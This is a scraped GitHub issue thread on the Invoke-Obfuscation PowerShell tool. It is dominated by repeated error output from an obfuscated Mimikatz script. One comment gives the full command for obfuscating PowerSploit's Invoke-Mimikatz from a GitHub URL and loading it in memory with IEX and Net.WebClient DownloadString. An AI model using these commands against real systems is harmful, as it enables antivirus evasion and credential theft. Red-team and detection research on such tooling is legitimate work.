+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+ [Byte[]]${vA`lue2by`TEs} = ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g') ("l1 ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke
The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+ if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], PropertyNotFoundException
+ FullyQualifiedErrorId : PropertyNotFoundStrict
from invoke-obfuscation.
danielbohannon
commented on September 25, 2024
Man, this continues to stump me. I'm not seeing this error for PS 2, 3 or 4. I wonder if there's something peculiar to Windows Server 2012. Would you mind uploaded the obfuscated script that you used to get the errors that you posted above? This will help me find out how to best replicate this issue so I can get it fixed. Thanks.
from invoke-obfuscation.
vivami
commented on September 25, 2024
Sure, that script uploaded here: https://cl.ly/jVlg I just tested it on Windows 8.1 (PS 4.0) as well, and it gives the the exact same error(s).
from invoke-obfuscation.
newlog
commented on September 25, 2024
@danielbohannon I cannot confirm, but downloading the ModernIE VMs might help you reproduce the issue. There you will get a standard Windows 7/8/10 machine with their default PowerShell version.
https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
After further testing, I can tell you for sure that some stages are not working on Win7 with the default (I hope) PS while working on Win10. Sorry I cannot give you more feedback than that.
from invoke-obfuscation.
byt3bl33d3r
commented on September 25, 2024
@danielbohannon bump. Any update on this issue?
from invoke-obfuscation.
danielbohannon
commented on September 25, 2024
@byt3bl33d3r -- thanks for holding my feet to the fire :) Unfortunately I've not had a chance to get a VM setup where I can successfully reproduce this issue. I've got a couple long flights in the coming weeks so hopefully I can sink some time into reproducing this issue and getting this resolved. This issue has been open for far longer than I like, so my apologies for that.
from invoke-obfuscation.
byt3bl33d3r
commented on September 25, 2024
@danielbohannon no worries! Thanks for the update! Anything else I can do to help let me know.
Cheers man.
from invoke-obfuscation.
kofa2002
commented on September 25, 2024
thank you all for this information
from invoke-obfuscation.
bwiltse
commented on September 25, 2024
I just came across this issue myself, It was powershell in Kali rolling, with powershell 6.1.0, running obfuscating the same payload from Empire in Windows 10 worked without issue.
from invoke-obfuscation.
dr0pd34d
commented on September 25, 2024
I currently have the same problem on two Windows hosts.
I used the following command line:
Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShel
lMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet > Kingdom3.ps1
On my Windows 10 Hosts with the following Powershell Version:
Name Value
PSVersion 5.1.17134.228
PSEdition Desktop
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.17134.228
CLRVersion 4.0.30319.42000
WSManStackVersion 3.0
PSRemotingProtocolVersion 2.3
SerializationVersion 1.1.0.1
Running the following commands:
PS C:\Test> IEX (New-Object Net.WebClient).DownloadString("C:\Test\Kingdom3.ps1")
PS C:\Test> INVOKE-MIMIkAtz
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:825 char:6
-
${GETPRoCad`D`ReSS} = ${UNsaf`ena`T`i`VEMEtHo`Ds}.("{0}{2}{1} ...- CategoryInfo : NotSpecified: (:) [], MethodInvocationException
- FullyQualifiedErrorId : DotNetMethodException
You cannot call a method on a null-valued expression.
At line:832 char:6
-
&("{1}{0}{2}"-f'ut','Write-O','put') ${GETprOCa`DDR`Ess}."InV ...- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : InvokeMethodOnNull
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:428 char:3
-
${VIr`Tu`A`laLlOC} = ( gET-vARIaBLe l2gRm ).value::("{4}{ ...- CategoryInfo : NotSpecified: (:) [], MethodException
- FullyQualifiedErrorId : MethodCountCouldNotFindBest
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:825 char:6
-
${GETPRoCad`D`ReSS} = ${UNsaf`ena`T`i`VEMEtHo`Ds}.("{0}{2}{1} ...- CategoryInfo : NotSpecified: (:) [], MethodInvocationException
- FullyQualifiedErrorId : DotNetMethodException
Has there already been a solution?
Thanks!
from invoke-obfuscation.
Related Issues (20)
- This command exceeds the cmd.exe maximum length of 8190. ? HOT 2
- PowerShell/Pklotide.A Detected in Onedrive HOT 1
- Out-ObfuscatedTokenCommand HOT 6
- CommandNotFoundException occured when start Invoke-Obsfucation HOT 1
- Trojan:PowerShell/PSAttackTool.A HOT 1
- obfuscated output truncated HOT 1
- String Token obfuscation breaks multiline string variable substitution
- The cmdlet does not start HOT 3
- Malware in your code. HOT 8
- :)
- Missing Modules that are in psd1 HOT 1
- Thecommand too larger
- Obfuscated code broken
- Contains Virus HOT 4
- create automated script HOT 1
- Error When using Out-EncodedSpecialCharOnlyCommand but only the file and not when using Invoke-Obfuscation.ps1
- "Invoke-Obfuscation.ps1" file code error.
- Can this thing do the .apk obfuscation and what abotu the scoore.
- encoding will jam Get stuck
- the option AST/ALL/1 do nothing in comparison to the old version, why?
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from invoke-obfuscation.